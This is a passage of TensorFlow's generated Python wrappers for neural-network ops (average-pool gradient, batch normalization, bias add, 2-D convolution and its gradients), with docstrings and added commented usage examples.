data_format = _execute.make_str(data_format, "data_format")
_attr_T, (grad,) = _execute.args_to_matching_eager([grad], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
orig_input_shape = _ops.convert_to_tensor(orig_input_shape, _dtypes.int32)
_inputs_flat = [orig_input_shape, grad]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"AvgPoolGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"AvgPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
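# --- Illustrative usage (editor's addition, not part of the generated file) ---
# The 2-D analogue of AvgPool3DGrad; shapes are assumptions for illustration:
#
#   import tensorflow as tf
#   grad = tf.random.normal([1, 2, 2, 3])  # gradient w.r.t. the avg_pool output
#   dx = tf.raw_ops.AvgPoolGrad(orig_input_shape=[1, 4, 4, 3], grad=grad,
#                               ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
#                               padding="VALID")
#   # dx has shape (1, 4, 4, 3).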
def _batch_norm_with_global_normalization(t, m, v, beta, gamma, variance_epsilon, scale_after_normalization, name=None):
r"""Batch normalization.
This op is deprecated. Prefer `tf.nn.batch_normalization`.
Args:
t: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `complex64`, `int64`, `qint8`, `quint8`, `qint32`, `bfloat16`, `uint16`, `complex128`, `half`, `uint32`, `uint64`.
A 4D input Tensor.
m: A `Tensor`. Must have the same type as `t`.
A 1D mean Tensor with size matching the last dimension of t.
This is the first output from tf.nn.moments,
or a saved moving average thereof.
v: A `Tensor`. Must have the same type as `t`.
A 1D variance Tensor with size matching the last dimension of t.
This is the second output from tf.nn.moments,
or a saved moving average thereof.
beta: A `Tensor`. Must have the same type as `t`.
A 1D beta Tensor with size matching the last dimension of t.
An offset to be added to the normalized tensor.
gamma: A `Tensor`. Must have the same type as `t`.
A 1D gamma Tensor with size matching the last dimension of t.
If "scale_after_normalization" is true, this tensor will be multiplied
with the normalized tensor.
variance_epsilon: A `float`. A small float number to avoid dividing by 0.
scale_after_normalization: A `bool`.
A bool indicating whether the resulting tensor
needs to be multiplied by gamma.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `t`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "BatchNormWithGlobalNormalization", name, t, m, v, beta, gamma,
"variance_epsilon", variance_epsilon, "scale_after_normalization",
scale_after_normalization)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return _batch_norm_with_global_normalization_eager_fallback(
t, m, v, beta, gamma, variance_epsilon=variance_epsilon,
scale_after_normalization=scale_after_normalization, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
variance_epsilon = _execute.make_float(variance_epsilon, "variance_epsilon")
scale_after_normalization = _execute.make_bool(scale_after_normalization, "scale_after_normalization")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"BatchNormWithGlobalNormalization", t=t, m=m, v=v, beta=beta,
gamma=gamma,
variance_epsilon=variance_epsilon,
scale_after_normalization=scale_after_normalization,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "variance_epsilon",
_op.get_attr("variance_epsilon"), "scale_after_normalization",
_op._get_attr_bool("scale_after_normalization"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"BatchNormWithGlobalNormalization", _inputs_flat, _attrs, _result)
_result, = _result
return _result
BatchNormWithGlobalNormalization = tf_export("raw_ops.BatchNormWithGlobalNormalization")(_ops.to_raw_op(_batch_norm_with_global_normalization))
def _batch_norm_with_global_normalization_eager_fallback(t, m, v, beta, gamma, variance_epsilon, scale_after_normalization, name, ctx):
variance_epsilon = _execute.make_float(variance_epsilon, "variance_epsilon")
scale_after_normalization = _execute.make_bool(scale_after_normalization, "scale_after_normalization")
_attr_T, _inputs_T = _execute.args_to_matching_eager([t, m, v, beta, gamma], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.complex64, _dtypes.int64, _dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.bfloat16, _dtypes.uint16, _dtypes.complex128, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(t, m, v, beta, gamma) = _inputs_T
_inputs_flat = [t, m, v, beta, gamma]
_attrs = ("T", _attr_T, "variance_epsilon", variance_epsilon,
"scale_after_normalization", scale_after_normalization)
_result = _execute.execute(b"BatchNormWithGlobalNormalization", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"BatchNormWithGlobalNormalization", _inputs_flat, _attrs, _result)
_result, = _result
return _result
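# --- Illustrative usage (editor's addition, not part of the generated file) ---
# The op is deprecated in favor of tf.nn.batch_normalization; a minimal
# sketch of the raw op with assumed shapes (m, v, beta, gamma match the
# last dimension of t):
#
#   import tensorflow as tf
#   t = tf.random.normal([2, 3, 3, 4])
#   out = tf.raw_ops.BatchNormWithGlobalNormalization(
#       t=t, m=tf.zeros([4]), v=tf.ones([4]), beta=tf.zeros([4]),
#       gamma=tf.ones([4]), variance_epsilon=0.001,
#       scale_after_normalization=True)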
_BatchNormWithGlobalNormalizationGradOutput = collections.namedtuple(
"BatchNormWithGlobalNormalizationGrad",
["dx", "dm", "dv", "db", "dg"])
def batch_norm_with_global_normalization_grad(t, m, v, gamma, backprop, variance_epsilon, scale_after_normalization, name=None):
r"""Gradients for batch normalization.
This op is deprecated. See `tf.nn.batch_normalization`.
Args:
t: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `complex64`, `int64`, `qint8`, `quint8`, `qint32`, `bfloat16`, `uint16`, `complex128`, `half`, `uint32`, `uint64`.
A 4D input Tensor.
m: A `Tensor`. Must have the same type as `t`.
A 1D mean Tensor with size matching the last dimension of t.
This is the first output from tf.nn.moments,
or a saved moving average thereof.
v: A `Tensor`. Must have the same type as `t`.
A 1D variance Tensor with size matching the last dimension of t.
This is the second output from tf.nn.moments,
or a saved moving average thereof.
gamma: A `Tensor`. Must have the same type as `t`.
A 1D gamma Tensor with size matching the last dimension of t.
If "scale_after_normalization" is true, this Tensor will be multiplied
with the normalized Tensor.
backprop: A `Tensor`. Must have the same type as `t`. 4D backprop Tensor.
variance_epsilon: A `float`. A small float number to avoid dividing by 0.
scale_after_normalization: A `bool`.
A bool indicating whether the resulting tensor
needs to be multiplied by gamma.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (dx, dm, dv, db, dg).
dx: A `Tensor`. Has the same type as `t`.
dm: A `Tensor`. Has the same type as `t`.
dv: A `Tensor`. Has the same type as `t`.
db: A `Tensor`. Has the same type as `t`.
dg: A `Tensor`. Has the same type as `t`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "BatchNormWithGlobalNormalizationGrad", name, t, m, v, gamma,
backprop, "variance_epsilon", variance_epsilon,
"scale_after_normalization", scale_after_normalization)
_result = _BatchNormWithGlobalNormalizationGradOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return batch_norm_with_global_normalization_grad_eager_fallback(
t, m, v, gamma, backprop, variance_epsilon=variance_epsilon,
scale_after_normalization=scale_after_normalization, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
variance_epsilon = _execute.make_float(variance_epsilon, "variance_epsilon")
scale_after_normalization = _execute.make_bool(scale_after_normalization, "scale_after_normalization")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"BatchNormWithGlobalNormalizationGrad", t=t, m=m, v=v, gamma=gamma,
backprop=backprop,
variance_epsilon=variance_epsilon,
scale_after_normalization=scale_after_normalization,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "variance_epsilon",
_op.get_attr("variance_epsilon"), "scale_after_normalization",
_op._get_attr_bool("scale_after_normalization"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"BatchNormWithGlobalNormalizationGrad", _inputs_flat, _attrs, _result)
_result = _BatchNormWithGlobalNormalizationGradOutput._make(_result)
return _result
BatchNormWithGlobalNormalizationGrad = tf_export("raw_ops.BatchNormWithGlobalNormalizationGrad")(_ops.to_raw_op(batch_norm_with_global_normalization_grad))
def batch_norm_with_global_normalization_grad_eager_fallback(t, m, v, gamma, backprop, variance_epsilon, scale_after_normalization, name, ctx):
variance_epsilon = _execute.make_float(variance_epsilon, "variance_epsilon")
scale_after_normalization = _execute.make_bool(scale_after_normalization, "scale_after_normalization")
_attr_T, _inputs_T = _execute.args_to_matching_eager([t, m, v, gamma, backprop], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.complex64, _dtypes.int64, _dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.bfloat16, _dtypes.uint16, _dtypes.complex128, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(t, m, v, gamma, backprop) = _inputs_T
_inputs_flat = [t, m, v, gamma, backprop]
_attrs = ("T", _attr_T, "variance_epsilon", variance_epsilon,
"scale_after_normalization", scale_after_normalization)
_result = _execute.execute(b"BatchNormWithGlobalNormalizationGrad", 5,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"BatchNormWithGlobalNormalizationGrad", _inputs_flat, _attrs, _result)
_result = _BatchNormWithGlobalNormalizationGradOutput._make(_result)
return _result
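# --- Illustrative usage (editor's addition, not part of the generated file) ---
# A hedged sketch of the gradient op; it returns the namedtuple
# (dx, dm, dv, db, dg) defined above. Shapes below are assumptions:
#
#   import tensorflow as tf
#   t = tf.random.normal([2, 3, 3, 4])
#   backprop = tf.random.normal([2, 3, 3, 4])  # same shape as t
#   g = tf.raw_ops.BatchNormWithGlobalNormalizationGrad(
#       t=t, m=tf.zeros([4]), v=tf.ones([4]), gamma=tf.ones([4]),
#       backprop=backprop, variance_epsilon=0.001,
#       scale_after_normalization=True)
#   # g.dx matches the shape of t.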
def bias_add(value, bias, data_format="NHWC", name=None):
r"""Adds `bias` to `value`.
This is a special case of `tf.add` where `bias` is restricted to be 1-D.
Broadcasting is supported, so `value` may have any number of dimensions.
Args:
value: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `complex64`, `int64`, `qint8`, `quint8`, `qint32`, `bfloat16`, `uint16`, `complex128`, `half`, `uint32`, `uint64`.
Any number of dimensions.
bias: A `Tensor`. Must have the same type as `value`.
1-D with size the last dimension of `value`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the bias tensor will be added to the last dimension
of the value tensor.
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
The tensor will be added to "in_channels", the third-to-the-last
dimension.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `value`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "BiasAdd", name, value, bias, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return bias_add_eager_fallback(
value, bias, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"BiasAdd", value=value, bias=bias, data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "data_format",
_op.get_attr("data_format"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"BiasAdd", _inputs_flat, _attrs, _result)
_result, = _result
return _result
BiasAdd = tf_export("raw_ops.BiasAdd")(_ops.to_raw_op(bias_add))
def bias_add_eager_fallback(value, bias, data_format, name, ctx):
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, _inputs_T = _execute.args_to_matching_eager([value, bias], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.complex64, _dtypes.int64, _dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.bfloat16, _dtypes.uint16, _dtypes.complex128, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(value, bias) = _inputs_T
_inputs_flat = [value, bias]
_attrs = ("T", _attr_T, "data_format", data_format)
_result = _execute.execute(b"BiasAdd", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"BiasAdd", _inputs_flat, _attrs, _result)
_result, = _result
return _result
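# --- Illustrative usage (editor's addition, not part of the generated file) ---
# A minimal sketch; `bias` is 1-D and broadcast over the last (feature)
# dimension of `value` under the default NHWC format. Shapes are assumed:
#
#   import tensorflow as tf
#   x = tf.random.normal([2, 5, 5, 3])
#   b = tf.constant([0.1, 0.2, 0.3])
#   y = tf.raw_ops.BiasAdd(value=x, bias=b)  # equivalent to tf.nn.bias_add(x, b)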
def bias_add_grad(out_backprop, data_format="NHWC", name=None):
r"""The backward operation for "BiasAdd" on the "bias" tensor.
It accumulates all the values from out_backprop into the feature dimension.
For NHWC data format, the feature dimension is the last. For NCHW data format,
the feature dimension is the third-to-last.
Args:
out_backprop: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `complex64`, `int64`, `qint8`, `quint8`, `qint32`, `bfloat16`, `uint16`, `complex128`, `half`, `uint32`, `uint64`.
Any number of dimensions.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the bias tensor will be added to the last dimension
of the value tensor.
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
The tensor will be added to "in_channels", the third-to-the-last
dimension.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `out_backprop`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "BiasAddGrad", name, out_backprop, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return bias_add_grad_eager_fallback(
out_backprop, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"BiasAddGrad", out_backprop=out_backprop, data_format=data_format,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "data_format",
_op.get_attr("data_format"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"BiasAddGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
BiasAddGrad = tf_export("raw_ops.BiasAddGrad")(_ops.to_raw_op(bias_add_grad))
def bias_add_grad_eager_fallback(out_backprop, data_format, name, ctx):
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (out_backprop,) = _execute.args_to_matching_eager([out_backprop], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.complex64, _dtypes.int64, _dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.bfloat16, _dtypes.uint16, _dtypes.complex128, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
_inputs_flat = [out_backprop]
_attrs = ("T", _attr_T, "data_format", data_format)
_result = _execute.execute(b"BiasAddGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"BiasAddGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
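# --- Illustrative usage (editor's addition, not part of the generated file) ---
# A hedged sketch: the op reduces out_backprop over every dimension except
# the feature dimension (the last one for NHWC). Shapes are assumptions:
#
#   import tensorflow as tf
#   g = tf.random.normal([2, 5, 5, 3])
#   db = tf.raw_ops.BiasAddGrad(out_backprop=g)
#   # db has shape (3,), one value per feature channel.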
def bias_add_v1(value, bias, name=None):
r"""Adds `bias` to `value`.
This is a deprecated version of BiasAdd and will soon be removed.
This is a special case of `tf.add` where `bias` is restricted to be 1-D.
Broadcasting is supported, so `value` may have any number of dimensions.
Args:
value: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `complex64`, `int64`, `qint8`, `quint8`, `qint32`, `bfloat16`, `uint16`, `complex128`, `half`, `uint32`, `uint64`.
Any number of dimensions.
bias: A `Tensor`. Must have the same type as `value`.
1-D with size the last dimension of `value`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `value`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "BiasAddV1", name, value, bias)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return bias_add_v1_eager_fallback(
value, bias, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"BiasAddV1", value=value, bias=bias, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"BiasAddV1", _inputs_flat, _attrs, _result)
_result, = _result
return _result
BiasAddV1 = tf_export("raw_ops.BiasAddV1")(_ops.to_raw_op(bias_add_v1))
def bias_add_v1_eager_fallback(value, bias, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([value, bias], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.complex64, _dtypes.int64, _dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.bfloat16, _dtypes.uint16, _dtypes.complex128, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(value, bias) = _inputs_T
_inputs_flat = [value, bias]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"BiasAddV1", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"BiasAddV1", _inputs_flat, _attrs, _result)
_result, = _result
return _result
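# --- Illustrative usage (editor's addition, not part of the generated file) ---
# BiasAddV1 is the deprecated variant without a data_format attribute; a
# minimal sketch with assumed shapes:
#
#   import tensorflow as tf
#   y = tf.raw_ops.BiasAddV1(value=tf.random.normal([2, 3]),
#                            bias=tf.constant([1.0, 2.0, 3.0]))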
def conv2d(input, filter, strides, padding, use_cudnn_on_gpu=True, explicit_paddings=[], data_format="NHWC", dilations=[1, 1, 1, 1], name=None):
r"""Computes a 2-D convolution given 4-D `input` and `filter` tensors.
Given an input tensor of shape `[batch, in_height, in_width, in_channels]`
and a filter / kernel tensor of shape
`[filter_height, filter_width, in_channels, out_channels]`, this op
performs the following:
1. Flattens the filter to a 2-D matrix with shape
`[filter_height * filter_width * in_channels, output_channels]`.
2. Extracts image patches from the input tensor to form a *virtual*
tensor of shape `[batch, out_height, out_width,
filter_height * filter_width * in_channels]`.
3. For each patch, right-multiplies the filter matrix and the image patch
vector.
In detail, with the default NHWC format,
output[b, i, j, k] =
sum_{di, dj, q} input[b, strides[1] * i + di, strides[2] * j + dj, q] *
filter[di, dj, q, k]
Must have `strides[0] = strides[3] = 1`. For the most common case of the same
horizontal and vertical strides, `strides = [1, stride, stride, 1]`.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`, `int32`.
A 4-D tensor. The dimension order is interpreted according to the value
of `data_format`, see below for details.
filter: A `Tensor`. Must have the same type as `input`.
A 4-D tensor of shape
`[filter_height, filter_width, in_channels, out_channels]`
strides: A list of `ints`.
1-D tensor of length 4. The stride of the sliding window for each
dimension of `input`. The dimension order is determined by the value of
`data_format`, see below for details.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
If `padding` is `"EXPLICIT"`, the list of explicit padding amounts. For the ith
dimension, the amount of padding inserted before and after the dimension is
`explicit_paddings[2 * i]` and `explicit_paddings[2 * i + 1]`, respectively. If
`padding` is not `"EXPLICIT"`, `explicit_paddings` must be empty.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, height, width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by the
value of `data_format`, see above for details. Dilations in the batch and
depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv2D", name, input, filter, "strides", strides,
"use_cudnn_on_gpu", use_cudnn_on_gpu, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format,
"dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv2d_eager_fallback(
input, filter, strides=strides, use_cudnn_on_gpu=use_cudnn_on_gpu,
padding=padding, explicit_paddings=explicit_paddings,
data_format=data_format, dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if use_cudnn_on_gpu is None:
use_cudnn_on_gpu = True
use_cudnn_on_gpu = _execute.make_bool(use_cudnn_on_gpu, "use_cudnn_on_gpu")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'conv2d' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv2d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv2D", input=input, filter=filter, strides=strides,
padding=padding, use_cudnn_on_gpu=use_cudnn_on_gpu,
explicit_paddings=explicit_paddings,
data_format=data_format, dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "use_cudnn_on_gpu",
_op._get_attr_bool("use_cudnn_on_gpu"), "padding",
_op.get_attr("padding"), "explicit_paddings",
_op.get_attr("explicit_paddings"), "data_format",
_op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv2D = tf_export("raw_ops.Conv2D")(_ops.to_raw_op(conv2d))
def conv2d_eager_fallback(input, filter, strides, padding, use_cudnn_on_gpu, explicit_paddings, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if use_cudnn_on_gpu is None:
use_cudnn_on_gpu = True
use_cudnn_on_gpu = _execute.make_bool(use_cudnn_on_gpu, "use_cudnn_on_gpu")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'conv2d' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv2d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, _dtypes.int32, ])
(input, filter) = _inputs_T
_inputs_flat = [input, filter]
_attrs = ("T", _attr_T, "strides", strides, "use_cudnn_on_gpu",
use_cudnn_on_gpu, "padding", padding, "explicit_paddings",
explicit_paddings, "data_format", data_format, "dilations", dilations)
_result = _execute.execute(b"Conv2D", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
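# --- Illustrative usage (editor's addition, not part of the generated file) ---
# A minimal sketch of the raw convolution op; the shapes below are
# assumptions chosen for illustration (NHWC input, HWIO filter):
#
#   import tensorflow as tf
#   x = tf.random.normal([1, 5, 5, 3])   # [batch, height, width, in_channels]
#   w = tf.random.normal([3, 3, 3, 8])   # [fh, fw, in_channels, out_channels]
#   y = tf.raw_ops.Conv2D(input=x, filter=w, strides=[1, 1, 1, 1],
#                         padding="SAME")
#   # y has shape (1, 5, 5, 8).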
def conv2d_backprop_filter(input, filter_sizes, out_backprop, strides, padding, use_cudnn_on_gpu=True, explicit_paddings=[], data_format="NHWC", dilations=[1, 1, 1, 1], name=None):
r"""Computes the gradients of convolution with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
4-D with shape `[batch, in_height, in_width, in_channels]`.
filter_sizes: A `Tensor` of type `int32`.
An integer vector representing the tensor shape of `filter`,
where `filter` is a 4-D
`[filter_height, filter_width, in_channels, out_channels]` tensor.
out_backprop: A `Tensor`. Must have the same type as `input`.
4-D with shape `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
of the convolution. Must be in the same order as the dimensions specified with
`data_format`.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
If `padding` is `"EXPLICIT"`, the list of explicit padding amounts. For the ith
dimension, the amount of padding inserted before and after the dimension is
`explicit_paddings[2 * i]` and `explicit_paddings[2 * i + 1]`, respectively. If
`padding` is not `"EXPLICIT"`, `explicit_paddings` must be empty.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each filter
element on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv2DBackpropFilter", name, input, filter_sizes, out_backprop,
"strides", strides, "use_cudnn_on_gpu", use_cudnn_on_gpu, "padding",
padding, "explicit_paddings", explicit_paddings, "data_format",
data_format, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv2d_backprop_filter_eager_fallback(
input, filter_sizes, out_backprop, strides=strides,
use_cudnn_on_gpu=use_cudnn_on_gpu, padding=padding,
explicit_paddings=explicit_paddings, data_format=data_format,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
